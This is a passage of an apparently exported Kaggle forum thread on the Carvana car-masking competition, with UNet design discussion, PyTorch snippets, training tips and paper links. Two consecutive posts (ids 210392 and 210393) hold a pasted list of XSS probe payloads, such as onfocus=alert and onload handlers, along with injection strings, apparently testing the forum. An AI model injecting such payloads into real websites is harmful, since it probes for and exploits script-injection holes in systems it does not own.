href=\"http://blog.qure.ai/notes/semantic-segmentation-deep-learning-review\">http://blog.qure.ai/notes/semantic-segmentation-deep-learning-review</a></p>",
      "rawMarkdown": "I didn't have time for this competition yet, but I was planning to take the approach you suggest: input all images rotations and output all masks at once.\n\nOther things to consider:\n\n- Don't go too deep on UNet, as masks are placed more or less on the same region. Instead, replace the two deepest levels with a \"global convolution\" (a convolution with kernel size equal to the side of the image at that level). The number of filters should not be more than the number of cars. This way, we may reduce the number of parameters and probably create a viable 1024x1024 version.\n\n- I'd suggest adding an \"upscale\" network to the workflow, after training and predicting the UNet. The input should be patches from original image stacked with the UNet output (channels R, G, B and Mask). These patches should always include border regions of mask (black and white pixels).\n\nFinal note: I'd suggest reading this recent post about image segmentation thechniques:\n- http://blog.qure.ai/notes/semantic-segmentation-deep-learning-review",
      "votes": null
    },
    {
      "id": "209545",
      "postDate": "08/02/2017 15:47:09",
      "content": "<p>@bang liu   and  @Sergey Mushinskiy</p>\n\n<p>Thank you for the comments. The initialization and learning rate are magical. I am running the experiments now, using unet512 without bn. The convergence rate is a bit slower, but time per epoch is reduced from  3 min to 2.2 min. Attached is the loss convergence of epoch-1. I will post experiment curve of with and without bn when my experiments are completed. Thanks again!</p>\n\n<p><a href=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6972/results-small-epoch-1.avi\">https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6972/results-small-epoch-1.avi</a> (red=ground_truth, green=prediction. if ground_truth==green, you should see only yellow)</p>\n\n<pre><code>class UNet512_no_bn_2 (nn.Module):\n\ndef __init__(self, in_shape, num_classes):\n    super(UNet512_no_bn_2, self).__init__()\n    in_channels, height, width = in_shape\n\n    self.down1 = nn.Sequential(\n        *make_conv_relu(in_channels, 16, kernel_size=3, stride=1, padding=1 ),\n        *make_conv_relu(16, 16, kernel_size=3, stride=1, padding=1 ),\n    )\n    ..... \n\n    self.classify = nn.Conv2d(16, num_classes, kernel_size=1, stride=1, padding=0 )\n\n    ## initialistaion\n    #  https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/37208\n    #  bang liu : random normal(mean=0,std=filter_width*filter_height*channel).\n\n    for m in self.modules():\n        if isinstance(m, nn.Conv2d):\n            n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n            m.weight.data.normal_(0, math.sqrt(2. / n))\n\n\ndef forward(self, x):\n\n    down1 = self.down1(x)\n    out   = F.max_pool2d(down1, kernel_size=2, stride=2) #64\n\n    down2 = self.down2(out)\n    out   = F.max_pool2d(down2, kernel_size=2, stride=2) #64\n    .....\n    out   = self.classify(out)\n\n    return out\n</code></pre>",
      "rawMarkdown": "bang liu   and  @Sergey Mushinskiy\n\nThank you for the comments. The initialization and learning rate are magical. I am running the experiments now, using unet512 without bn. The convergence rate is a bit slower, but time per epoch is reduced from  3 min to 2.2 min. Attached is the loss convergence of epoch-1. I will post experiment curve of with and without bn when my experiments are completed. Thanks again!\n \n[https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6972/results-small-epoch-1.avi][1] (red=ground_truth, green=prediction. if ground_truth==green, you should see only yellow)\n\n\n\n    class UNet512_no_bn_2 (nn.Module):\n\n    def __init__(self, in_shape, num_classes):\n        super(UNet512_no_bn_2, self).__init__()\n        in_channels, height, width = in_shape\n\n        self.down1 = nn.Sequential(\n            *make_conv_relu(in_channels, 16, kernel_size=3, stride=1, padding=1 ),\n            *make_conv_relu(16, 16, kernel_size=3, stride=1, padding=1 ),\n        )\n        ..... \n\n        self.classify = nn.Conv2d(16, num_classes, kernel_size=1, stride=1, padding=0 )\n\n        ## initialistaion\n        #  https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/37208\n        #  bang liu : random normal(mean=0,std=filter_width*filter_height*channel).\n\n        for m in self.modules():\n            if isinstance(m, nn.Conv2d):\n                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n                m.weight.data.normal_(0, math.sqrt(2. / n))\n\n\n    def forward(self, x):\n\n        down1 = self.down1(x)\n        out   = F.max_pool2d(down1, kernel_size=2, stride=2) #64\n\n        down2 = self.down2(out)\n        out   = F.max_pool2d(down2, kernel_size=2, stride=2) #64\n        .....\n        out   = self.classify(out)\n\n        return out\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6972/results-small-epoch-1.avi",
      "votes": null
    },
    {
      "id": "209598",
      "postDate": "08/02/2017 19:16:41",
      "content": "<p>In your next update, could you publish your Split folder?  I can't tell which images you used in the test_3197 file.  Many thanks!</p>",
      "rawMarkdown": "In your next update, could you publish your Split folder?  I can't tell which images you used in the test_3197 file.  Many thanks!",
      "votes": null
    },
    {
      "id": "209642",
      "postDate": "08/02/2017 22:28:32",
      "content": "<p>Coded up a U-nets implementation <a href=\"https://www.kaggle.com/ecobill/u-nets-with-keras/\">here</a> that is relevant to this post! Let me know what you thing!</p>",
      "rawMarkdown": "Coded up a U-nets implementation [here][1] that is relevant to this post! Let me know what you thing!\n\n\n  [1]: https://www.kaggle.com/ecobill/u-nets-with-keras/",
      "votes": null
    },
    {
      "id": "209652",
      "postDate": "08/02/2017 23:15:33",
      "content": "<p>my implementation here <a href=\"https://www.kaggle.com/ecobill/u-nets-with-keras/\">https://www.kaggle.com/ecobill/u-nets-with-keras/</a></p>",
      "rawMarkdown": "my implementation here https://www.kaggle.com/ecobill/u-nets-with-keras/",
      "votes": null
    },
    {
      "id": "209699",
      "postDate": "08/03/2017 04:51:39",
      "content": "<p>i have added to the 07-30 release. test_3197 is for visualization only. it is not used in training and will not affect results.</p>",
      "rawMarkdown": "i have added to the 07-30 release. test_3197 is for visualization only. it is not used in training and will not affect results.",
      "votes": null
    },
    {
      "id": "209701",
      "postDate": "08/03/2017 04:56:26",
      "content": "<p>@Bruno G. do Amaral</p>\n\n<p>\"I'd suggest adding an \"upscale\" network ...\" thank you for your comment. i am thinking of this too. I am looking at refineNet. I am thinking if i want to do it end-to-end (which require large memory) or train  separate networks stagewise, with a network output feed into the input of another stage.</p>\n\n<p>it can be as simple as two-stage or three stage.</p>\n\n<p>Thanks for the link! Here is another link for review of segmentation:\n<a href=\"https://meetshah1995.github.io/semantic-segmentation/deep-learning/pytorch/visdom/2017/06/01/semantic-segmentation-over-the-years.html\">https://meetshah1995.github.io/semantic-segmentation/deep-learning/pytorch/visdom/2017/06/01/semantic-segmentation-over-the-years.html</a></p>",
      "rawMarkdown": "Bruno G. do Amaral\n \n\"I'd suggest adding an \"upscale\" network ...\" thank you for your comment. i am thinking of this too. I am looking at refineNet. I am thinking if i want to do it end-to-end (which require large memory) or train  separate networks stagewise, with a network output feed into the input of another stage.\n\nit can be as simple as two-stage or three stage.\n\nThanks for the link! Here is another link for review of segmentation:\nhttps://meetshah1995.github.io/semantic-segmentation/deep-learning/pytorch/visdom/2017/06/01/semantic-segmentation-over-the-years.html",
      "votes": null
    },
    {
      "id": "209709",
      "postDate": "08/03/2017 05:32:40",
      "content": "<p>anyone using dilated convolution here? Does it improves results?</p>",
      "rawMarkdown": "anyone using dilated convolution here? Does it improves results?",
      "votes": null
    },
    {
      "id": "209754",
      "postDate": "08/03/2017 09:47:34",
      "content": "<p>@Barek \nI have tried your method and it works well for me. <br>\nI don't have to save a 104GB numpy array on my local anymore. <br>\nInstead the size shrink to only 26GB when the uint8 array of size 100000x512x512 is saved. <br>\nHowever, I have used another way to allocate numpy array first by using <code>np.memmap(outdir, dtype=np.uint8, mode='w+', shape=(100064,512,512))</code>. <br>\nBy doing this I don't have to read the entire array into my memory. <br>\n<a href=\"https://docs.scipy.org/doc/numpy/reference/generated/numpy.memmap.html\">https://docs.scipy.org/doc/numpy/reference/generated/numpy.memmap.html</a></p>",
      "rawMarkdown": "Barek \nI have tried your method and it works well for me.  \nI don't have to save a 104GB numpy array on my local anymore.  \nInstead the size shrink to only 26GB when the uint8 array of size 100000x512x512 is saved.  \nHowever, I have used another way to allocate numpy array first by using ```np.memmap(outdir, dtype=np.uint8, mode='w+', shape=(100064,512,512))```.  \nBy doing this I don't have to read the entire array into my memory.",
      "votes": null
    },
    {
      "id": "209782",
      "postDate": "08/03/2017 11:47:36",
      "content": "<p>I would love to, but I think dilated convolutions do increase memory consumption a lot (and it seems like many configurations of cudnn/pytorch are not optimised for dilation?)</p>",
      "rawMarkdown": "I would love to, but I think dilated convolutions do increase memory consumption a lot (and it seems like many configurations of cudnn/pytorch are not optimised for dilation?)",
      "votes": null
    },
    {
      "id": "209784",
      "postDate": "08/03/2017 11:51:44",
      "content": "<p>Does pytorch has dilated layer?</p>",
      "rawMarkdown": "Does pytorch has dilated layer?",
      "votes": null
    },
    {
      "id": "209899",
      "postDate": "08/03/2017 18:20:50",
      "content": "<p><a href=\"http://pytorch.org/docs/master/nn.html#convolution-layers\">http://pytorch.org/docs/master/nn.html#convolution-layers</a>\nYea I think the dilation parameter does control dilation</p>",
      "rawMarkdown": "http://pytorch.org/docs/master/nn.html#convolution-layers\nYea I think the dilation parameter does control dilation",
      "votes": null
    },
    {
      "id": "210016",
      "postDate": "08/04/2017 03:08:00",
      "content": "<p>How much RAM do you use @Heng CherKeng? I even got problem loading the training images. Sorry for a dump question, I'm new to the field.</p>",
      "rawMarkdown": "How much RAM do you use @Heng CherKeng? I even got problem loading the training images. Sorry for a dump question, I'm new to the field.",
      "votes": null
    },
    {
      "id": "210017",
      "postDate": "08/04/2017 03:09:51",
      "content": "<p>i have 128GB ram. check the code and set is_preload=False in the dataset init function.</p>",
      "rawMarkdown": "i have 128GB ram. check the code and set is_preload=False in the dataset init function.",
      "votes": null
    },
    {
      "id": "210018",
      "postDate": "08/04/2017 03:13:57",
      "content": "<p>training at original resolution! I crop 1024x1024 from the original image. The results look good. The spikes in my previous 1024 attempt is due to small batch size. I think you need at least batch_size = 32 (use caffe accumulate gradient trick, i.e. iter_size in the prototxt file) blue=batch_size_8, red = batch_size_32. This is a new unet using 1024 as input and 1024 as output.</p>\n\n<p>My feeling is that is will be a 0.997 solution. To get to 0.998, some refinement strategy is required.</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/210018/6982/loss_1024_crop0.png\" alt=\"enter image description here\" title=\"\">\n <img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/210018/6980/0d1a9caf4350_02.jpg\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "training at original resolution! I crop 1024x1024 from the original image. The results look good. The spikes in my previous 1024 attempt is due to small batch size. I think you need at least batch_size = 32 (use caffe accumulate gradient trick, i.e. iter_size in the prototxt file) blue=batch_size_8, red = batch_size_32. This is a new unet using 1024 as input and 1024 as output.\n\nMy feeling is that is will be a 0.997 solution. To get to 0.998, some refinement strategy is required.\n\n ![enter image description here][1]\n ![enter image description here][2]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/210018/6982/loss_1024_crop0.png\n  [2]: https://kaggle2.blob.core.windows.net/forum-message-attachments/210018/6980/0d1a9caf4350_02.jpg",
      "votes": null
    },
    {
      "id": "210019",
      "postDate": "08/04/2017 03:15:39",
      "content": "<p>Thank you so much ^^</p>",
      "rawMarkdown": "Thank you so much ^^",
      "votes": null
    },
    {
      "id": "210032",
      "postDate": "08/04/2017 04:45:53",
      "content": "<p>i try 5x5 filter. it does improve the results a little but is very slow and some overfitting. so i am thinking that dilated conv might help.</p>",
      "rawMarkdown": "i try 5x5 filter. it does improve the results a little but is very slow and some overfitting. so i am thinking that dilated conv might help.",
      "votes": null
    },
    {
      "id": "210038",
      "postDate": "08/04/2017 05:04:11",
      "content": "<p>yet another idea. background prediction model:\nrgb --&gt;[feature_net]--&gt;predicted_background_rgb--&gt;z=abs(predicted_background_rgb-rgb--&gt;sigmoid[scale(z+shift)]--&gt;loss</p>",
      "rawMarkdown": "yet another idea. background prediction model:\nrgb --&gt;[feature_net]--&gt;predicted_background_rgb--&gt;z=abs(predicted_background_rgb-rgb--&gt;sigmoid[scale(z+shift)]--&gt;loss",
      "votes": null
    },
    {
      "id": "210039",
      "postDate": "08/04/2017 05:12:01",
      "content": "<p>But using dilated conv will cost too much memory(maybe 4~8 times),or you will also downsample the feature map ?</p>",
      "rawMarkdown": "But using dilated conv will cost too much memory(maybe 4~8 times),or you will also downsample the feature map ?",
      "votes": null
    },
    {
      "id": "210040",
      "postDate": "08/04/2017 05:18:40",
      "content": "<pre><code>boundary refinement:\n\"Laplacian Pyramid Reconstruction and Refinement for Semantic Segmentation\" -  G. Ghiasi, C. Fowlkes, eccv 2016\n</code></pre>\n\n<p><a href=\"http://www.ics.uci.edu/~gghiasi/\">http://www.ics.uci.edu/~gghiasi/</a></p>\n\n<p>smart idea to detect the boundary using max and inverted max pooling\n <img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/210040/6983/xx1.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "boundary refinement:\n    \"Laplacian Pyramid Reconstruction and Refinement for Semantic Segmentation\" -  G. Ghiasi, C. Fowlkes, eccv 2016\n    \nhttp://www.ics.uci.edu/~gghiasi/\n\nsmart idea to detect the boundary using max and inverted max pooling\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/210040/6983/xx1.png",
      "votes": null
    },
    {
      "id": "210041",
      "postDate": "08/04/2017 05:22:05",
      "content": "<pre><code>Rethinking Atrous Convolution for Semantic Image Segmentation\nSubmitted on 17 Jun 2017\nArxiv Link\n</code></pre>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6984/deeplabv3.png\" alt=\"enter image description here\" title=\"\"></p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6990/context.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "Rethinking Atrous Convolution for Semantic Image Segmentation\n    Submitted on 17 Jun 2017\n    Arxiv Link\n\n  ![enter image description here][1]\n  \n\n  ![enter image description here][2]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6984/deeplabv3.png\n  [2]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6990/context.png",
      "votes": null
    },
    {
      "id": "210075",
      "postDate": "08/04/2017 08:38:33",
      "content": "<p>Reply for your first doubt <br>\n1. using bilinear upsampling is better than deconvolution layer in unet (which i don't know why ... i suspect overfitting) <br>\nIt might be that deconvolutions tend to introduce characteristic artifacts, you can check out this. <a href=\"https://distill.pub/2016/deconv-checkerboard/\">https://distill.pub/2016/deconv-checkerboard/</a></p>",
      "rawMarkdown": "Reply for your first doubt  \n1. using bilinear upsampling is better than deconvolution layer in unet (which i don't know why ... i suspect overfitting)  \nIt might be that deconvolutions tend to introduce characteristic artifacts, you can check out this.",
      "votes": null
    },
    {
      "id": "210078",
      "postDate": "08/04/2017 08:52:29",
      "content": "<p>By training in 1024x1024, I am wondering how to predict the result under 1918 * 1280?</p>",
      "rawMarkdown": "By training in 1024x1024, I am wondering how to predict the result under 1918 * 1280?",
      "votes": null
    },
    {
      "id": "210079",
      "postDate": "08/04/2017 08:56:03",
      "content": "<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6985/2x1024.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6985/2x1024.png",
      "votes": null
    },
    {
      "id": "210117",
      "postDate": "08/04/2017 11:27:18",
      "content": "<p>After reading <a href=\"http://tanbakuchi.com/posts/comparison-of-openv-interpolation-algorithms/\">http://tanbakuchi.com/posts/comparison-of-openv-interpolation-algorithms/</a> I've checked the best interpolation method for our masks again with N=500, width=384 and height=256:\n<img src=\"http://i.imgur.com/hlCbamW.png\" alt=\"Interpolation Comparision\" title=\"\"></p>",
      "rawMarkdown": "After reading http://tanbakuchi.com/posts/comparison-of-openv-interpolation-algorithms/ I've checked the best interpolation method for our masks again with N=500, width=384 and height=256:\n![Interpolation Comparision][1]\n\n  [1]: http://i.imgur.com/hlCbamW.png",
      "votes": null
    },
    {
      "id": "210144",
      "postDate": "08/04/2017 12:41:54",
      "content": "<p>That's cool. But how to make sure the patch cover all the car if it's facing towards you or backwards? I haven't checked all the  images </p>",
      "rawMarkdown": "That's cool. But how to make sure the patch cover all the car if it's facing towards you or backwards? I haven't checked all the  images",
      "votes": null
    },
    {
      "id": "210149",
      "postDate": "08/04/2017 13:00:23",
      "content": "<p>you can get bounding box from initial estimate</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6987/two-stage.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "you can get bounding box from initial estimate\n \n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6987/two-stage.png",
      "votes": null
    },
    {
      "id": "210207",
      "postDate": "08/04/2017 16:47:28",
      "content": "<p>How long does it take for you to predict all test images + generate RLE file?</p>\n\n<p>I managed to train at native resolution (1918x1280), left it training for ~1 day but predictions + RLE will take ~15-20 hours...</p>",
      "rawMarkdown": "How long does it take for you to predict all test images + generate RLE file?\n\nI managed to train at native resolution (1918x1280), left it training for ~1 day but predictions + RLE will take ~15-20 hours...",
      "votes": null
    },
    {
      "id": "210210",
      "postDate": "08/04/2017 16:51:12",
      "content": "<p>generate RLE  takes 20 min\n(see kernel section for fast RLE)</p>\n\n<p>just prediction at 1024x1024 takes 1 to 2 hr.\nbut there are overheads like storing 1024x1024 probability to disk, etc</p>",
      "rawMarkdown": "generate RLE  takes 20 min\n(see kernel section for fast RLE)\n\njust prediction at 1024x1024 takes 1 to 2 hr.\nbut there are overheads like storing 1024x1024 probability to disk, etc",
      "votes": null
    },
    {
      "id": "210220",
      "postDate": "08/04/2017 17:43:18",
      "content": "<p>i changed my strategy. From my experiments, direct prediction from full resolution or slightly smaller (e.g 1024x1916) can also work. so there is no need to divide into crops, etc</p>",
      "rawMarkdown": "i changed my strategy. From my experiments, direct prediction from full resolution or slightly smaller (e.g 1024x1916) can also work. so there is no need to divide into crops, etc",
      "votes": null
    },
    {
      "id": "210235",
      "postDate": "08/04/2017 19:03:52",
      "content": "<p>UNets seem to be working great for you! How do you manage memory consumption with this image size? I guess for most UNets this is too big to even fit a single image into memory?</p>",
      "rawMarkdown": "UNets seem to be working great for you! How do you manage memory consumption with this image size? I guess for most UNets this is too big to even fit a single image into memory?",
      "votes": null
    },
    {
      "id": "210293",
      "postDate": "08/05/2017 01:43:49",
      "content": "<p>surprising, max no. of images for 1024x1916 is 8. i use 12 GB pascal titanx. as long as you can stable BN moving statistics, you can:</p>\n\n<pre><code>enter code here\n\nprint ('batch_size*num_grad_acc')  \nfor epoch in range(start_epoch, num_epoches):   \n\n    adjust_learning_rate(optimizer, lr/num_grad_acc)\n    rate =  get_learning_rate(optimizer)[0]*num_grad_acc  \n\n    net.train()\n    for it, (images, labels, indices) in enumerate(train_loader, 0):\n        images  = Variable(images.cuda())\n        labels  = Variable(labels.cuda())\n\n        #forward\n        logits = net(images)\n        probs  = F.sigmoid(logits)\n        masks  = (probs&amp;gt;0.5).float()\n\n\n        #backward\n        loss = criterion(logits, labels)\n        # optimizer.zero_grad()\n        # loss.backward()\n        # optimizer.step()\n\n        # accumulate gradients\n        if it==0:\n            optimizer.zero_grad()\n        loss.backward()\n        if it%num_grad_acc==0:\n            optimizer.step()\n            optimizer.zero_grad()  # assume no effects on bn for accumulating grad\n</code></pre>\n\n<p>`</p>",
      "rawMarkdown": "surprising, max no. of images for 1024x1916 is 8. i use 12 GB pascal titanx. as long as you can stable BN moving statistics, you can:\n\n    enter code here\n\n    print ('batch_size*num_grad_acc')  \n    for epoch in range(start_epoch, num_epoches):   \n      \n        adjust_learning_rate(optimizer, lr/num_grad_acc)\n        rate =  get_learning_rate(optimizer)[0]*num_grad_acc  \n  \n        net.train()\n        for it, (images, labels, indices) in enumerate(train_loader, 0):\n            images  = Variable(images.cuda())\n            labels  = Variable(labels.cuda())\n\n            #forward\n            logits = net(images)\n            probs  = F.sigmoid(logits)\n            masks  = (probs&gt;0.5).float()\n\n\n            #backward\n            loss = criterion(logits, labels)\n            # optimizer.zero_grad()\n            # loss.backward()\n            # optimizer.step()\n\n            # accumulate gradients\n            if it==0:\n                optimizer.zero_grad()\n            loss.backward()\n            if it%num_grad_acc==0:\n                optimizer.step()\n                optimizer.zero_grad()  # assume no effects on bn for accumulating grad\n\n`",
      "votes": null
    },
    {
      "id": "210315",
      "postDate": "08/05/2017 04:55:16",
      "content": "<p><a href=\"https://www.semanticscholar.org/paper/Label-Refinement-Network-for-Coarse-to-Fine-Semant-Islam-Naha/3b60af814574ebe389856e9f7008bb83b0539abc\">https://www.semanticscholar.org/paper/Label-Refinement-Network-for-Coarse-to-Fine-Semant-Islam-Naha/3b60af814574ebe389856e9f7008bb83b0539abc</a></p>\n\n<p>see also the cvpr 2017 paper:\nGated feedback refinement network for dense image labeling</p>\n\n<p>www.cs.umanitoba.ca/~ywang</p>\n\n<p><img src=\"https://ai2-s2-public.s3.amazonaws.com/figures/2016-11-08/3b60af814574ebe389856e9f7008bb83b0539abc/1-Figure1-1.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "https://www.semanticscholar.org/paper/Label-Refinement-Network-for-Coarse-to-Fine-Semant-Islam-Naha/3b60af814574ebe389856e9f7008bb83b0539abc\n\nsee also the cvpr 2017 paper:\nGated feedback refinement network for dense image labeling\n\nwww.cs.umanitoba.ca/~ywang\n\n ![enter image description here][1]\n\n\n  [1]: https://ai2-s2-public.s3.amazonaws.com/figures/2016-11-08/3b60af814574ebe389856e9f7008bb83b0539abc/1-Figure1-1.png",
      "votes": null
    },
    {
      "id": "210317",
      "postDate": "08/05/2017 05:13:19",
      "content": "<p>if you want ot use TTA (test time augmentation), you may need to find ways to speed up inference. here is a trick.</p>\n\n<p>\"In order to speed up inference time, we use the following\nequations to remove the batch normalization layer in our\nnetwork at test time.\"</p>\n\n<p>DSSD : Deconvolutional Single Shot Detector </p>\n\n<p><a href=\"http://www.cs.unc.edu/~cyfu/\">http://www.cs.unc.edu/~cyfu/</a></p>\n\n<p>similar trick is used in Intel's PVANet:</p>\n\n<p><a href=\"https://github.com/sanghoon/pva-faster-rcnn/issues/5\">https://github.com/sanghoon/pva-faster-rcnn/issues/5</a></p>",
      "rawMarkdown": "if you want ot use TTA (test time augmentation), you may need to find ways to speed up inference. here is a trick.\n\n\"In order to speed up inference time, we use the following\nequations to remove the batch normalization layer in our\nnetwork at test time.\"\n\nDSSD : Deconvolutional Single Shot Detector \n\nhttp://www.cs.unc.edu/~cyfu/\n\n\nsimilar trick is used in Intel's PVANet:\n\nhttps://github.com/sanghoon/pva-faster-rcnn/issues/5",
      "votes": null
    },
    {
      "id": "210345",
      "postDate": "08/05/2017 08:26:06",
      "content": "<p>Interesting. Is inference time already a bottleneck for you?</p>",
      "rawMarkdown": "Interesting. Is inference time already a bottleneck for you?",
      "votes": null
    },
    {
      "id": "210357",
      "postDate": "08/05/2017 09:38:02",
      "content": "<p>So what's the batch size here and num_grad_acc? I guess training time takes a hit though at this size?</p>",
      "rawMarkdown": "So what's the batch size here and num_grad_acc? I guess training time takes a hit though at this size?",
      "votes": null
    },
    {
      "id": "210389",
      "postDate": "08/05/2017 12:32:23",
      "content": "<p>it takes 14 min to train for 1024x2048 per epoch (actaully 2~3 min is due to data augmentation). effective_batch_size = num_grad_accxbtach_size can be 4x8=32 or 4x16=64. i am still experimentally. and yes, the effective_batch_size does affect results </p>",
      "rawMarkdown": "it takes 14 min to train for 1024x2048 per epoch (actaully 2~3 min is due to data augmentation). effective_batch_size = num_grad_accxbtach_size can be 4x8=32 or 4x16=64. i am still experimentally. and yes, the effective_batch_size does affect results",
      "votes": null
    },
    {
      "id": "210392",
      "postDate": "08/05/2017 12:35:24",
      "content": "<p>\"&gt;/\nprompt(/920065/)\n\"onmouseover=\"confirm(2);\n\"&gt;\n\"--&gt;\n\"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n\"&gt;confirm(/XSs;/)\n;print(md5(xss)); set|set&amp;set\ntext//;value=<code>autofocus onfocus=alert(1) a=</code>&gt;</p>\n\n<blockquote>\n  <p>\n  <code>-alert`/1/`\"&gt;'onload=\"`-alert</code>1<code>\"&gt;'onload=\"</code>1\"autofocus \"[user]\"&gt;/\n  prompt(/920065/)\n  \"onmouseover=\"confirm(2);\n  \"&gt;\n  \"--&gt;\n  \"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n  \"&gt;confirm(/XSs;/)[video]\"&gt;/\n  prompt(/920065/)\n  \"onmouseover=\"confirm(2);\n  \"&gt;\n  \"--&gt;\n  \"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n  \"&gt;confirm(/XSs;/)[image]\"&gt;/\n  prompt(/920065/)\n  \"onmouseover=\"confirm(2);\n  \"&gt;\n  \"--&gt;\n  \"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n  \"&gt;confirm(/XSs;/)\n  ;print(md5(xss)); set|set&amp;set\n  text//;value=<code>autofocus onfocus=alert(1) a=</code>&gt;\n  \"&gt;\n</p></blockquote>\n\n<p><code>-alert</code>/1/<code>\"&gt;'onload=\"</code>-alert1<code>\"&gt;'onload=\"</code>document.domain\"autofocus \"[/image]\n;print(md5(xss)); set|set&amp;set\ntext//;value=<code>autofocus onfocus=alert(1) a=</code>&gt;</p>\n\n<blockquote>\n  <p>\n  <code>-alert`/1/`\"&gt;'onload=\"`-alert</code>1<code>\"&gt;'onload=\"</code>\n  \n  <code>-alert`/1/`\"&gt;'onload=\"`-alert`1`\"&gt;'onload=\"`1</code>\"autofocus \"</p>\n</blockquote>",
      "rawMarkdown": "\"&gt;<img src=\"x\">/",
      "votes": null
    },
    {
      "id": "210393",
      "postDate": "08/05/2017 12:36:22",
      "content": "<p>\"&gt;/\nprompt(/920065/)\n\"onmouseover=\"confirm(2);\n\"&gt;\n\"--&gt;\n\"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n\"&gt;confirm(/XSs;/)\n;print(md5(xss)); set|set&amp;set\ntext//;value=<code>autofocus onfocus=alert(1) a=</code>&gt;</p>\n\n<blockquote>\n  <p>\n  <code>-alert`/1/`\"&gt;'onload=\"`-alert</code>1<code>\"&gt;'onload=\"</code>1\"autofocus \"[user]\"&gt;/\n  prompt(/920065/)\n  \"onmouseover=\"confirm(2);\n  \"&gt;\n  \"--&gt;\n  \"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n  \"&gt;confirm(/XSs;/)[video]\"&gt;/\n  prompt(/920065/)\n  \"onmouseover=\"confirm(2);\n  \"&gt;\n  \"--&gt;\n  \"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n  \"&gt;confirm(/XSs;/)[image]\"&gt;/\n  prompt(/920065/)\n  \"onmouseover=\"confirm(2);\n  \"&gt;\n  \"--&gt;\n  \"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n  \"&gt;confirm(/XSs;/)\n  ;print(md5(xss)); set|set&amp;set\n  text//;value=<code>autofocus onfocus=alert(1) a=</code>&gt;\n  \"&gt;\n</p></blockquote>\n\n<p><code>-alert</code>/1/<code>\"&gt;'onload=\"</code>-alert1<code>\"&gt;'onload=\"</code>document.domain\"autofocus \"[/image]\n;print(md5(xss)); set|set&amp;set\ntext//;value=<code>autofocus onfocus=alert(1) a=</code>&gt;</p>\n\n<blockquote>\n  <p>\n  <code>-alert`/1/`\"&gt;'onload=\"`-alert</code>1<code>\"&gt;'onload=\"</code>\n  \n  <code>-alert`/1/`\"&gt;'onload=\"`-alert`1`\"&gt;'onload=\"`1</code>\"autofocus \"</p>\n</blockquote>",
      "rawMarkdown": "\"&gt;<img src=\"x\">/",
      "votes": null
    },
    {
      "id": "210394",
      "postDate": "08/05/2017 12:47:24",
      "content": "<p>it seems that there are quite some work that deal with full resolution segmentation. Also my current unet use stacked 3x3 filters (like vgg-16). Here are some papers that uses residual block, etc to repalce it. They claimed better accuracy and efficiency.</p>\n\n<p>\"Efficient ConvNet for Real-time Semantic Segmentation\"- Eduardo Romera1, Jose´ M. A´ lvarez2, Luis M. Bergasa1 and Roberto Arroyo</p>\n\n<p>\"LinkNet: Exploiting Encoder Representations for Efficient Semantic Segmentation\" - Abhishek Chaurasia</p>\n\n<p>\" Not All Pixels Are Equal: Difficulty-Aware Semantic Segmentation via Deep Layer Cascade\" - Xiaoxiao Li</p>\n\n<p>\"ICNet for Real-Time Semantic Segmentation on High-Resolution Images\"- Hengshuang Zhao1</p>\n\n<p>\"Improving Fully Convolution Network for Semantic Segmentation\" - Bing Shuai</p>\n\n<p>\"Full-Resolution Residual Networks for Semantic Segmentation in Street Scenes\" - Tobias Pohlen</p>\n\n<p>\"The One Hundred Layers Tiramisu: Fully Convolutional DenseNets for Semantic Segmentation\" - Simon J´egou1</p>\n\n<p>\"ENet: A Deep Neural Network Architecture for Real-Time Semantic Segmentation\" - Adam Paszke</p>",
